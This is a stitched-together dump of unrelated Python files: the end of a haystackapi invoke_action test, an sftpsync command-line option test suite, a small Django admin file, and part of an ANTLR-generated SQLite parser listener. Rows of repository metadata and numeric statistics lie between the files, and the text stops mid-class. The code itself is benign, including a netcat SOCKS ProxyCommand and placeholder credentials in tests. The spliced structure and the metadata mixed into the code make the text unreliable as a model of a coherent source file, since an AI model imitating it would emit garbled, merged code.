@patch.object(ping.Provider, 'invoke_action')
def test_invoke_action_without_params_with_zinc(mock):
    # GIVEN
    mock.return_value = ping.PingGrid
    mime_type = haystackapi.MODE_ZINC
    request = HaystackHttpRequest()
    grid = haystackapi.Grid(metadata={'id': Ref('123'), 'action': 'doIt'},
                            columns={'key': {}, 'value': {}})
    request.headers["Content-Type"] = mime_type
    request.headers["Accept"] = mime_type
    request.body = haystackapi.dump(grid, mode=haystackapi.MODE_ZINC)

    # WHEN
    response = haystackapi.invoke_action(request, "dev")

    # THEN
    mock.assert_called_once_with(Ref("123"), "doIt", {})
    assert response.status_code == 200
    assert response.headers["Content-Type"].startswith(mime_type)
    assert haystackapi.parse(response.body, haystackapi.MODE_ZINC) is not None
| 37.888889 | 78 | 0.699902 | 242 | 2,046 | 5.752066 | 0.256198 | 0.045977 | 0.081897 | 0.025862 | 0.855603 | 0.855603 | 0.855603 | 0.855603 | 0.855603 | 0.855603 | 0 | 0.010508 | 0.162757 | 2,046 | 53 | 79 | 38.603774 | 0.802102 | 0.015152 | 0 | 0.789474 | 0 | 0 | 0.133466 | 0.025896 | 0 | 0 | 0 | 0 | 0.210526 | 1 | 0.052632 | false | 0 | 0.131579 | 0 | 0.184211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
48cb998d8975433383331744ddb6819de1b68348 | 24,494 | py | Python | tests/command_line_test.py | marccarre/sftpsync | cf408f6b768fd5c7c0559cb25e72020f92a5a5f6 | [
"Apache-2.0"
] | 1 | 2015-04-01T20:30:48.000Z | 2015-04-01T20:30:48.000Z | tests/command_line_test.py | marccarre/sftpsync | cf408f6b768fd5c7c0559cb25e72020f92a5a5f6 | [
"Apache-2.0"
] | null | null | null | tests/command_line_test.py | marccarre/sftpsync | cf408f6b768fd5c7c0559cb25e72020f92a5a5f6 | [
"Apache-2.0"
] | 2 | 2015-03-31T18:40:17.000Z | 2021-08-15T16:12:37.000Z | from unittest2 import TestCase, main
from tests.test_utilities import FakeStdOut, FakeStdErr, NonWritableFolder, NonReadableFolder, path_for
from six import assertRaisesRegex
from getpass import getuser
from sftpsync.command_line import usage, configure
import socks
DEFAULT_ARGS = ['sftp://user:pass@sftp-server.example.com:22/data', path_for('.')]
class CommandLineTest(TestCase):
def test_usage(self):
with FakeStdOut() as out:
usage()
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_usage_with_error_message(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
usage('Invalid argument "foo".')
self.assertIn('ERROR: Invalid argument "foo".', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_with_non_existing_short_option(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['-z'])
self.assertIn('ERROR: option -z not recognized', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_with_non_existing_long_option(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['--non-existing'])
self.assertIn('ERROR: option --non-existing not recognized', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_help_short_option(self):
with FakeStdOut() as out:
self.assertRaisesRegex(SystemExit, '', configure, ['-h'])
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_help_long_option(self):
with FakeStdOut() as out:
self.assertRaisesRegex(SystemExit, '', configure, ['--help'])
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_defaults(self):
config = configure([] + DEFAULT_ARGS)
self.assertEqual(config['force'], False)
self.assertEqual(config['preserve'], False)
self.assertEqual(config['quiet'], False)
self.assertEqual(config['recursive'], False)
self.assertEqual(config['verbose'], False)
self.assertIsNone(config['private_key'])
self.assertIsNone(config['proxy'])
self.assertEqual(config['proxy_version'], socks.SOCKS5)
self.assertEqual(len(config['ssh_options']), 0)
def test_configure_force_short_option(self):
config = configure(['-f'] + DEFAULT_ARGS)
self.assertEqual(config['force'], True)
def test_configure_force_long_option(self):
config = configure(['--force'] + DEFAULT_ARGS)
self.assertEqual(config['force'], True)
def test_configure_preserve_short_option(self):
config = configure(['-p'] + DEFAULT_ARGS)
self.assertEqual(config['preserve'], True)
def test_configure_preserve_long_option(self):
config = configure(['--preserve'] + DEFAULT_ARGS)
self.assertEqual(config['preserve'], True)
def test_configure_quiet_short_option(self):
config = configure(['-q'] + DEFAULT_ARGS)
self.assertEqual(config['quiet'], True)
def test_configure_quiet_long_option(self):
config = configure(['--quiet'] + DEFAULT_ARGS)
self.assertEqual(config['quiet'], True)
def test_configure_recursive_short_option(self):
config = configure(['-r'] + DEFAULT_ARGS)
self.assertEqual(config['recursive'], True)
def test_configure_recursive_long_option(self):
config = configure(['--recursive'] + DEFAULT_ARGS)
self.assertEqual(config['recursive'], True)
def test_configure_verbose_short_option(self):
config = configure(['-v'] + DEFAULT_ARGS)
self.assertEqual(config['verbose'], True)
def test_configure_verbose_long_option(self):
config = configure(['--verbose'] + DEFAULT_ARGS)
self.assertEqual(config['verbose'], True)
def test_configure_verbose_and_quiet_at_the_same_time(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['--quiet', '--verbose'] + DEFAULT_ARGS)
self.assertIn('ERROR: Please provide either -q/--quiet OR -v/--verbose, but NOT both at the same time.', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_identity_short_option(self):
config = configure(['-i', path_for('test_sftp_server_rsa')] + DEFAULT_ARGS)
self.assertIsNotNone(config['private_key'])
# Verify path components:
self.assertIn('sftpsync', config['private_key'])
self.assertIn('tests', config['private_key'])
self.assertIn('test_sftp_server_rsa', config['private_key'])
def test_configure_identity_long_option(self):
config = configure(['--identity', path_for('test_sftp_server_rsa')] + DEFAULT_ARGS)
self.assertIsNotNone(config['private_key'])
# Verify path components:
self.assertIn('sftpsync', config['private_key'])
self.assertIn('tests', config['private_key'])
self.assertIn('test_sftp_server_rsa', config['private_key'])
def test_configure_missing_identity(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['--identity'])
self.assertIn('ERROR: option --identity requires argument', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_empty_identity(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['--identity', ''] + DEFAULT_ARGS)
self.assertIn('ERROR: Invalid path: "". Please provide a valid path to your private key.', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_non_existing_identity(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['--identity', path_for('non_existing_private_key')] + DEFAULT_ARGS)
error_message = err.getvalue()
self.assertIn('ERROR: Invalid path: "', error_message)
self.assertIn('non_existing_private_key". Provided path does NOT exist. Please provide a valid path to your private key.', error_message)
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_ssh_configuration_short_option(self):
config = configure(['-F', path_for('test_ssh_config')] + DEFAULT_ARGS)
self.assertIsNotNone(config['ssh_config'])
# Verify path components:
self.assertIn('sftpsync', config['ssh_config'])
self.assertIn('tests', config['ssh_config'])
self.assertIn('test_ssh_config', config['ssh_config'])
def test_configure_missing_ssh_configuration(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['-F'])
self.assertIn('ERROR: option -F requires argument', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_empty_ssh_configuration(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['-F', ''] + DEFAULT_ARGS)
self.assertIn('ERROR: Invalid path: "". Please provide a valid path to your SSH configuration.', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_non_existing_ssh_configuration(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['-F', path_for('non_existing_ssh_config')] + DEFAULT_ARGS)
error_message = err.getvalue()
self.assertIn('ERROR: Invalid path: "', error_message)
self.assertIn('non_existing_ssh_config". Provided path does NOT exist. Please provide a valid path to your SSH configuration.', error_message)
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_ssh_option_proxy_command_using_equal_sign(self):
config = configure(['-o', 'ProxyCommand=nc -X 5 -x localhost:1080 %h %p'] + DEFAULT_ARGS)
self.assertEqual(len(config['ssh_options']), 1)
self.assertEqual(config['ssh_options']['ProxyCommand'], 'nc -X 5 -x localhost:1080 %h %p')
def test_configure_ssh_option_proxy_command_using_whitespace(self):
config = configure(['-o', 'ProxyCommand nc -X 5 -x localhost:1080 %h %p'] + DEFAULT_ARGS)
self.assertEqual(len(config['ssh_options']), 1)
self.assertEqual(config['ssh_options']['ProxyCommand'], 'nc -X 5 -x localhost:1080 %h %p')
def test_configure_missing_ssh_option(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['-o'])
self.assertIn('ERROR: option -o requires argument', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
    def test_configure_empty_ssh_option(self):
        with FakeStdOut() as out:
            with FakeStdErr() as err:
                self.assertRaisesRegex(SystemExit, '2', configure, ['-o', ''] + DEFAULT_ARGS)
                self.assertIn('ERROR: Invalid SSH option: "".', err.getvalue())
                self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())

    def test_configure_ssh_option_with_empty_key_using_equal_sign(self):
        with FakeStdOut() as out:
            with FakeStdErr() as err:
                self.assertRaisesRegex(SystemExit, '2', configure, ['-o', '=nc -X 5 -x localhost:1080 %h %p'] + DEFAULT_ARGS)
                self.assertIn('ERROR: Invalid SSH option: "=nc -X 5 -x localhost:1080 %h %p".', err.getvalue())
                self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())

    def test_configure_ssh_option_with_empty_value_using_equal_sign(self):
        with FakeStdOut() as out:
            with FakeStdErr() as err:
                self.assertRaisesRegex(SystemExit, '2', configure, ['-o', 'ProxyCommand='] + DEFAULT_ARGS)
                self.assertIn('ERROR: Invalid SSH option: "ProxyCommand=', err.getvalue())
                self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())

    def test_configure_ssh_option_with_empty_key_using_whitespace(self):
        with FakeStdOut() as out:
            with FakeStdErr() as err:
                self.assertRaisesRegex(SystemExit, '2', configure, ['-o', ' nc -X 5 -x localhost:1080 %h %p'] + DEFAULT_ARGS)
                self.assertIn('ERROR: Invalid SSH option: " nc -X 5 -x localhost:1080 %h %p".', err.getvalue())
                self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())

    def test_configure_ssh_option_with_empty_value_using_whitespace(self):
        with FakeStdOut() as out:
            with FakeStdErr() as err:
                self.assertRaisesRegex(SystemExit, '2', configure, ['-o', 'ProxyCommand '] + DEFAULT_ARGS)
                self.assertIn('ERROR: Invalid SSH option: "ProxyCommand ', err.getvalue())
                self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())

    def test_configure_ssh_option_unsupported_option_using_equal_sign(self):
        with FakeStdOut() as out:
            with FakeStdErr() as err:
                self.assertRaisesRegex(SystemExit, '2', configure, ['-o', 'User=john'] + DEFAULT_ARGS)
                error_message = err.getvalue()
                self.assertIn('ERROR: Unsupported SSH option: "User". Only the following SSH options are currently supported: ProxyCommand.', error_message)
                self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())

    def test_configure_ssh_option_unsupported_option_using_whitespace(self):
        with FakeStdOut() as out:
            with FakeStdErr() as err:
                self.assertRaisesRegex(SystemExit, '2', configure, ['-o', 'User john'] + DEFAULT_ARGS)
                error_message = err.getvalue()
                self.assertIn('ERROR: Unsupported SSH option: "User". Only the following SSH options are currently supported: ProxyCommand.', error_message)
                self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
    def test_configure_proxy_host(self):
        config = configure(['--proxy', 'proxy-server.example.com'] + DEFAULT_ARGS)
        self.assertEqual(len(config['proxy']), 1)
        self.assertEqual(config['proxy']['host'], 'proxy-server.example.com')

    def test_configure_proxy_user_host(self):
        config = configure(['--proxy', 'anonymous@proxy-server.example.com'] + DEFAULT_ARGS)
        self.assertEqual(len(config['proxy']), 2)
        self.assertEqual(config['proxy']['host'], 'proxy-server.example.com')
        self.assertEqual(config['proxy']['user'], 'anonymous')

    def test_configure_proxy_user_host_port(self):
        config = configure(['--proxy', 'anonymous@proxy-server.example.com:1080'] + DEFAULT_ARGS)
        self.assertEqual(len(config['proxy']), 3)
        self.assertEqual(config['proxy']['host'], 'proxy-server.example.com')
        self.assertEqual(config['proxy']['user'], 'anonymous')
        self.assertEqual(config['proxy']['port'], '1080')

    def test_configure_proxy_user_password_host(self):
        config = configure(['--proxy', 'anonymous:password123@proxy-server.example.com'] + DEFAULT_ARGS)
        self.assertEqual(len(config['proxy']), 3)
        self.assertEqual(config['proxy']['host'], 'proxy-server.example.com')
        self.assertEqual(config['proxy']['user'], 'anonymous')
        self.assertEqual(config['proxy']['pass'], 'password123')

    def test_configure_proxy_user_password_host_port(self):
        config = configure(['--proxy', 'anonymous:password123@proxy-server.example.com:1080'] + DEFAULT_ARGS)
        self.assertEqual(len(config['proxy']), 4)
        self.assertEqual(config['proxy']['host'], 'proxy-server.example.com')
        self.assertEqual(config['proxy']['user'], 'anonymous')
        self.assertEqual(config['proxy']['pass'], 'password123')
        self.assertEqual(config['proxy']['port'], '1080')
    def test_configure_missing_proxy(self):
        with FakeStdOut() as out:
            with FakeStdErr() as err:
                self.assertRaisesRegex(SystemExit, '2', configure, ['--proxy'])
                self.assertIn('ERROR: option --proxy requires argument', err.getvalue())
                self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())

    def test_configure_empty_proxy(self):
        with FakeStdOut() as out:
            with FakeStdErr() as err:
                self.assertRaisesRegex(SystemExit, '2', configure, ['--proxy', ''] + DEFAULT_ARGS)
                self.assertIn('ERROR: Invalid proxy: "".', err.getvalue())
                self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())

    def test_configure_proxy_version_socks_4(self):
        config = configure(['--proxy-version', 'SOCKS4'] + DEFAULT_ARGS)
        self.assertEqual(config['proxy_version'], socks.SOCKS4)

    def test_configure_proxy_version_socks_5(self):
        config = configure(['--proxy-version', 'SOCKS5'] + DEFAULT_ARGS)
        self.assertEqual(config['proxy_version'], socks.SOCKS5)

    def test_configure_missing_proxy_version(self):
        with FakeStdOut() as out:
            with FakeStdErr() as err:
                self.assertRaisesRegex(SystemExit, '2', configure, ['--proxy-version'])
                self.assertIn('ERROR: option --proxy-version requires argument', err.getvalue())
                self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())

    def test_configure_empty_proxy_version(self):
        with FakeStdOut() as out:
            with FakeStdErr() as err:
                self.assertRaisesRegex(SystemExit, '2', configure, ['--proxy-version', ''] + DEFAULT_ARGS)
                self.assertIn('ERROR: Invalid SOCKS proxy version: "". Please choose one of the following values: { SOCKS4, SOCKS5 }.', err.getvalue())
                self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())

    def test_configure_invalid_proxy_version(self):
        with FakeStdOut() as out:
            with FakeStdErr() as err:
                self.assertRaisesRegex(SystemExit, '2', configure, ['--proxy-version', 'SOCKS1337-which-does-not-exist'] + DEFAULT_ARGS)
                self.assertIn('ERROR: Invalid SOCKS proxy version: "SOCKS1337-which-does-not-exist". Please choose one of the following values: { SOCKS4, SOCKS5 }.', err.getvalue())
                self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
    def test_configure_arguments_sftp_source_local_destination_user_password_host_port_path(self):
        config = configure(['sftp://yoda:p4$$w0rd@sftp-server.example.com:22/data', '.'])
        self.assertEqual(len(config['source']), 5)
        self.assertEqual(config['source']['host'], 'sftp-server.example.com')
        self.assertEqual(config['source']['user'], 'yoda')
        self.assertEqual(config['source']['pass'], 'p4$$w0rd')
        self.assertEqual(config['source']['port'], '22')
        self.assertEqual(config['source']['path'], '/data')
        self.assertEqual(config['destination'], '.')

    def test_configure_arguments_sftp_source_local_destination_user_password_host_port(self):
        config = configure(['sftp://yoda:p4$$w0rd@sftp-server.example.com:22', '.'])
        self.assertEqual(len(config['source']), 4)
        self.assertEqual(config['source']['host'], 'sftp-server.example.com')
        self.assertEqual(config['source']['user'], 'yoda')
        self.assertEqual(config['source']['pass'], 'p4$$w0rd')
        self.assertEqual(config['source']['port'], '22')

    def test_configure_arguments_sftp_source_local_destination_user_password_host(self):
        config = configure(['sftp://yoda:p4$$w0rd@sftp-server.example.com', '.'])
        self.assertEqual(len(config['source']), 3)
        self.assertEqual(config['source']['host'], 'sftp-server.example.com')
        self.assertEqual(config['source']['user'], 'yoda')
        self.assertEqual(config['source']['pass'], 'p4$$w0rd')

    def test_configure_arguments_sftp_source_local_destination_user_host(self):
        config = configure(['sftp://yoda@sftp-server.example.com', '.'])
        self.assertEqual(len(config['source']), 2)
        self.assertEqual(config['source']['host'], 'sftp-server.example.com')
        self.assertEqual(config['source']['user'], 'yoda')

    def test_configure_arguments_sftp_source_local_destination_host(self):
        config = configure(['sftp://sftp-server.example.com', '.'])
        self.assertEqual(len(config['source']), 1)
        self.assertEqual(config['source']['host'], 'sftp-server.example.com')

    def test_configure_arguments_sftp_source_local_destination_user_password_host_path(self):
        config = configure(['sftp://yoda:p4$$w0rd@sftp-server.example.com:/data', '.'])
        self.assertEqual(len(config['source']), 4)
        self.assertEqual(config['source']['host'], 'sftp-server.example.com')
        self.assertEqual(config['source']['user'], 'yoda')
        self.assertEqual(config['source']['pass'], 'p4$$w0rd')
        self.assertEqual(config['source']['path'], '/data')

    def test_configure_arguments_sftp_source_local_destination_user_password_host_path_without_colon(self):
        config = configure(['sftp://yoda:p4$$w0rd@sftp-server.example.com/data', '.'])
        self.assertEqual(len(config['source']), 4)
        self.assertEqual(config['source']['host'], 'sftp-server.example.com')
        self.assertEqual(config['source']['user'], 'yoda')
        self.assertEqual(config['source']['pass'], 'p4$$w0rd')
        self.assertEqual(config['source']['path'], '/data')

    def test_configure_arguments_sftp_source_local_destination_current_folder(self):
        config = configure(['sftp://yoda:p4$$w0rd@sftp-server.example.com:22/data', '.'])
        self.assertEqual(config['destination'], '.')

    def test_configure_arguments_sftp_source_local_destination_parent_folder(self):
        config = configure(['sftp://yoda:p4$$w0rd@sftp-server.example.com:22/data', '..'])
        self.assertEqual(config['destination'], '..')

    def test_configure_arguments_sftp_source_local_destination_root_folder(self):
        config = configure(['sftp://yoda:p4$$w0rd@sftp-server.example.com:22/data', path_for('.')])
        self.assertEqual(config['destination'], path_for('.'))
    def test_configure_arguments_sftp_source_local_destination_non_existing_destination_folder(self):
        with FakeStdOut() as out:
            with FakeStdErr() as err:
                self.assertRaisesRegex(SystemExit, '2', configure, ['sftp://yoda:p4$$w0rd@sftp-server.example.com:22/data', '/non/existing/folder'])
                self.assertIn('ERROR: Invalid path. "/non/existing/folder" does NOT exist.', err.getvalue())
                self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())

    def test_configure_arguments_sftp_source_local_destination_non_writable_folder(self):
        with NonWritableFolder() as path:
            with FakeStdOut() as out:
                with FakeStdErr() as err:
                    self.assertRaisesRegex(SystemExit, '2', configure, ['sftp://yoda:p4$$w0rd@sftp-server.example.com:22/data', path])
                    self.assertIn('ERROR: Invalid path. "%s" exists but user "%s" does NOT have write access.' % (path, getuser()), err.getvalue())
                    self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())

    def test_configure_arguments_local_source_sftp_destination_user_password_host_port_path(self):
        config = configure(['.', 'sftp://yoda:p4$$w0rd@sftp-server.example.com:22/data'])
        self.assertEqual(config['source'], '.')
        self.assertEqual(len(config['destination']), 5)
        self.assertEqual(config['destination']['host'], 'sftp-server.example.com')
        self.assertEqual(config['destination']['user'], 'yoda')
        self.assertEqual(config['destination']['pass'], 'p4$$w0rd')
        self.assertEqual(config['destination']['port'], '22')
        self.assertEqual(config['destination']['path'], '/data')

    def test_configure_arguments_local_source_sftp_destination_non_existing_source_folder(self):
        with FakeStdOut() as out:
            with FakeStdErr() as err:
                self.assertRaisesRegex(SystemExit, '2', configure, ['/non/existing/folder', 'sftp://yoda:p4$$w0rd@sftp-server.example.com:22/data'])
                self.assertIn('ERROR: Invalid path. "/non/existing/folder" does NOT exist.', err.getvalue())
                self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())

    def test_configure_arguments_local_source_sftp_destination_non_readable_folder(self):
        with NonReadableFolder() as path:
            with FakeStdOut() as out:
                with FakeStdErr() as err:
                    self.assertRaisesRegex(SystemExit, '2', configure, [path, 'sftp://yoda:p4$$w0rd@sftp-server.example.com:22/data'])
                    self.assertIn('ERROR: Invalid path. "%s" exists but user "%s" does NOT have read access.' % (path, getuser()), err.getvalue())
                    self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())

if __name__ == '__main__':
    main()
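The tests above rely on `FakeStdOut` and `FakeStdErr` context managers (defined elsewhere in the test suite, alongside helpers like `NonWritableFolder` and `path_for`) whose implementation does not appear in this chunk. A minimal sketch compatible with the `out.getvalue()` / `err.getvalue()` calls could look like this — the class bodies here are an assumption, not the project's actual code:

```python
import io
import sys


class FakeStdOut:
    """Capture sys.stdout in a StringIO buffer for the duration of a with-block."""

    def __enter__(self):
        self._old, sys.stdout = sys.stdout, io.StringIO()
        return sys.stdout

    def __exit__(self, *exc):
        sys.stdout = self._old
        return False  # do not swallow exceptions such as SystemExit


class FakeStdErr:
    """Capture sys.stderr in a StringIO buffer for the duration of a with-block."""

    def __enter__(self):
        self._old, sys.stderr = sys.stderr, io.StringIO()
        return sys.stderr

    def __exit__(self, *exc):
        sys.stderr = self._old
        return False
```

Returning the `StringIO` object itself from `__enter__` is what lets the tests keep calling `out.getvalue()` even after the block has exited and the real stream has been restored.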

# --- File: backend/shops/admin.py (repo: singsaker/intern, license: MIT) ---
from django.contrib import admin
from .models import Product, ProductCategory, Sale, Shop
admin.site.register(Shop)
admin.site.register(Product)
admin.site.register(ProductCategory)
admin.site.register(Sale)

# --- File: src/pyensae/languages/SQLiteParserListener.py (repo: sdpython/pyensae, license: MIT) ---
# Generated from \SQLiteParser.g4 by ANTLR 4.9
from antlr4 import *
if __name__ is not None and "." in __name__:
    from .SQLiteParser import SQLiteParser
else:
    from SQLiteParser import SQLiteParser

# This class defines a complete listener for a parse tree produced by SQLiteParser.
class SQLiteParserListener(ParseTreeListener):

    # Enter a parse tree produced by SQLiteParser#parse.
    def enterParse(self, ctx: SQLiteParser.ParseContext):
        pass

    # Exit a parse tree produced by SQLiteParser#parse.
    def exitParse(self, ctx: SQLiteParser.ParseContext):
        pass
    # Enter a parse tree produced by SQLiteParser#sql_stmt_list.
    def enterSql_stmt_list(self, ctx: SQLiteParser.Sql_stmt_listContext):
        pass

    # Exit a parse tree produced by SQLiteParser#sql_stmt_list.
    def exitSql_stmt_list(self, ctx: SQLiteParser.Sql_stmt_listContext):
        pass

    # Enter a parse tree produced by SQLiteParser#sql_stmt.
    def enterSql_stmt(self, ctx: SQLiteParser.Sql_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#sql_stmt.
    def exitSql_stmt(self, ctx: SQLiteParser.Sql_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#alter_table_stmt.
    def enterAlter_table_stmt(self, ctx: SQLiteParser.Alter_table_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#alter_table_stmt.
    def exitAlter_table_stmt(self, ctx: SQLiteParser.Alter_table_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#analyze_stmt.
    def enterAnalyze_stmt(self, ctx: SQLiteParser.Analyze_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#analyze_stmt.
    def exitAnalyze_stmt(self, ctx: SQLiteParser.Analyze_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#attach_stmt.
    def enterAttach_stmt(self, ctx: SQLiteParser.Attach_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#attach_stmt.
    def exitAttach_stmt(self, ctx: SQLiteParser.Attach_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#begin_stmt.
    def enterBegin_stmt(self, ctx: SQLiteParser.Begin_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#begin_stmt.
    def exitBegin_stmt(self, ctx: SQLiteParser.Begin_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#commit_stmt.
    def enterCommit_stmt(self, ctx: SQLiteParser.Commit_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#commit_stmt.
    def exitCommit_stmt(self, ctx: SQLiteParser.Commit_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#rollback_stmt.
    def enterRollback_stmt(self, ctx: SQLiteParser.Rollback_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#rollback_stmt.
    def exitRollback_stmt(self, ctx: SQLiteParser.Rollback_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#savepoint_stmt.
    def enterSavepoint_stmt(self, ctx: SQLiteParser.Savepoint_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#savepoint_stmt.
    def exitSavepoint_stmt(self, ctx: SQLiteParser.Savepoint_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#release_stmt.
    def enterRelease_stmt(self, ctx: SQLiteParser.Release_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#release_stmt.
    def exitRelease_stmt(self, ctx: SQLiteParser.Release_stmtContext):
        pass
    # Enter a parse tree produced by SQLiteParser#create_index_stmt.
    def enterCreate_index_stmt(self, ctx: SQLiteParser.Create_index_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#create_index_stmt.
    def exitCreate_index_stmt(self, ctx: SQLiteParser.Create_index_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#indexed_column.
    def enterIndexed_column(self, ctx: SQLiteParser.Indexed_columnContext):
        pass

    # Exit a parse tree produced by SQLiteParser#indexed_column.
    def exitIndexed_column(self, ctx: SQLiteParser.Indexed_columnContext):
        pass

    # Enter a parse tree produced by SQLiteParser#create_table_stmt.
    def enterCreate_table_stmt(self, ctx: SQLiteParser.Create_table_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#create_table_stmt.
    def exitCreate_table_stmt(self, ctx: SQLiteParser.Create_table_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#column_def.
    def enterColumn_def(self, ctx: SQLiteParser.Column_defContext):
        pass

    # Exit a parse tree produced by SQLiteParser#column_def.
    def exitColumn_def(self, ctx: SQLiteParser.Column_defContext):
        pass

    # Enter a parse tree produced by SQLiteParser#type_name.
    def enterType_name(self, ctx: SQLiteParser.Type_nameContext):
        pass

    # Exit a parse tree produced by SQLiteParser#type_name.
    def exitType_name(self, ctx: SQLiteParser.Type_nameContext):
        pass

    # Enter a parse tree produced by SQLiteParser#column_constraint.
    def enterColumn_constraint(self, ctx: SQLiteParser.Column_constraintContext):
        pass

    # Exit a parse tree produced by SQLiteParser#column_constraint.
    def exitColumn_constraint(self, ctx: SQLiteParser.Column_constraintContext):
        pass

    # Enter a parse tree produced by SQLiteParser#signed_number.
    def enterSigned_number(self, ctx: SQLiteParser.Signed_numberContext):
        pass

    # Exit a parse tree produced by SQLiteParser#signed_number.
    def exitSigned_number(self, ctx: SQLiteParser.Signed_numberContext):
        pass

    # Enter a parse tree produced by SQLiteParser#table_constraint.
    def enterTable_constraint(self, ctx: SQLiteParser.Table_constraintContext):
        pass

    # Exit a parse tree produced by SQLiteParser#table_constraint.
    def exitTable_constraint(self, ctx: SQLiteParser.Table_constraintContext):
        pass

    # Enter a parse tree produced by SQLiteParser#foreign_key_clause.
    def enterForeign_key_clause(self, ctx: SQLiteParser.Foreign_key_clauseContext):
        pass

    # Exit a parse tree produced by SQLiteParser#foreign_key_clause.
    def exitForeign_key_clause(self, ctx: SQLiteParser.Foreign_key_clauseContext):
        pass

    # Enter a parse tree produced by SQLiteParser#conflict_clause.
    def enterConflict_clause(self, ctx: SQLiteParser.Conflict_clauseContext):
        pass

    # Exit a parse tree produced by SQLiteParser#conflict_clause.
    def exitConflict_clause(self, ctx: SQLiteParser.Conflict_clauseContext):
        pass
    # Enter a parse tree produced by SQLiteParser#create_trigger_stmt.
    def enterCreate_trigger_stmt(self, ctx: SQLiteParser.Create_trigger_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#create_trigger_stmt.
    def exitCreate_trigger_stmt(self, ctx: SQLiteParser.Create_trigger_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#create_view_stmt.
    def enterCreate_view_stmt(self, ctx: SQLiteParser.Create_view_stmtContext):
        pass

